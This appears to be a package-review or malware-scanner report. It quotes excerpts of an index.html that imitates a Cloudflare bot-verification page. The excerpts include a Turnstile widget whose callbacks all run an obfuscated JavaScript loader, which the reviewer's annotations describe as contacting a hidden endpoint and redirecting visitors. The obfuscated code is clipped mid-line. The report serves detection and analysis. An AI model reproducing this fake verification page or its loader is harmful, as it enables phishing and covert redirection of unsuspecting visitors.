Lines 158-231text
158 flex-direction: column;
161 .footer-wrapper { display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap; gap: 10px; }
162 .ray-id { font-family: monospace; font-size: 13px; color: #8c8c8c; }
163 .ray-id code { font-family: monospace; font-weight: bold; }
164 .footer-link-wrapper { font-size: 13px; color: #8c8c8c; display: flex; align-items: center; }
165 .footer-text a { color: #0051c3; text-decoration: none; }
166 .footer-text a:hover { text-decoration: underline; }
167 .footer-divider { display: inline-block; width: 1px; height: 12px; background-color: #8c8c8c; margin: 0 10px; }
168 @media (max-width: 600px) {
169 .footer-wrapper { flex-direction: column; align-items: flex-start; }
170 .footer-divider { display: none; }
171 .footer-link-wrapper { flex-direction: column; align-items: flex-start; gap: 4px; }
176<div class="main-wrapper" role="main">
177 <div class="main-content">
178 <div class="ch-title-zone"><h1>Performing security verification</h1></div>
179 <p class="ch-description">
180 This website uses a security service to protect against malicious bots. This page is displayed while the website verifies you are not a bot.
181 </p>
HighAi Review Evidence
The sole shipped HTML is a fake Cloudflare-style verification page.
index.htmlView on unpkg · L178 183 <div class="cf-turnstile-container">
184 <div class="cf-turnstile"
185 data-appearance="always"
186 data-sitekey="0x4AAAAAADrvn4rDM7WVvgPh"
188 data-language="en-US"
189 data-callback="onTurnstileComplete"
190 data-error-callback="onTurnstileComplete"
191 data-expired-callback="onTurnstileComplete"
192 data-timeout-callback="onTurnstileComplete"
193 data-unsupported-callback="onTurnstileComplete">
HighAi Review Evidence
Every Turnstile callback invokes a heavily obfuscated routine.
index.htmlView on unpkg · L188 198<div class="footer" role="contentinfo">
199 <div class="footer-inner">
200 <div class="footer-wrapper">
201 <div class="clearfix diagnostic-wrapper">
202 <div class="ray-id">Ray ID: <code id="dynamic-ray-id">---------</code></div>
204 <div class="footer-link-wrapper">
205 <span class="footer-text">
206 Performance and Security by
207 <a rel="noopener noreferrer" href="https://www.cloudflare.com/?utm_source=challenge&utm_campaign=m" target="_blank">Cloudflare</a>
209 <span class="footer-divider"></span>
210 <a id="privacy-link" target="_blank" rel="noopener noreferrer" href="https://www.cloudflare.com/privacypolicy/" class="footer-text">Privacy</a>
217 function generateRayId() {
218 const chars = '0123456789abcdef';
220 for (let i = 0; i < 16; i++) result += chars[Math.floor(Math.random() * 16)];
223 document.getElementById('dynamic-ray-id').textContent = generateRayId();
226 function onTurnstileComplete(token) {
HighAi Review Evidence
That routine contacts a concealed endpoint, decrypts a server-supplied destination, copies the current query parameters, and redirects the browser.
index.htmlView on unpkg · L226 227 function _0x4d2b(_0x403e0a,_0x28b0ab){_0x403e0a=_0x403e0a-(0x110c+-0x2584+0x15e1);const _0x2aa8dc=_0x5788();let _0x46939d=_0x2aa8dc[_0x403e0a];if(_0x4d2b['hNNmcj']===undefined){var _0xd0ff89=function(_0x12ba27){const _0x40917c='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x407318='',_0x5a87a5='',_0x393899=_0x407318+_0xd0ff89,_0xcb7e7c=(''+function(){return 0x15*-0x8+-0x862+-0x90a*-0x1;})['indexOf']('\x0a')!==-(-0x290+-0x12e5+0x1576);for(let _0x5ac179=0x15*0xba+-0xe83+-0xbf*0x1,_0x37e8e8,_0x4dc301,_0x22e264=0x1aa+0x7*0x35a+-0x192*0x10;_0x4dc301=_0x12ba27['cha ...
228 }
HighObfuscated Payload Loader
Source contains an obfuscated payload loader that reconstructs and executes hidden code.
index.htmlView on unpkg · L226 Long lines were clipped for display.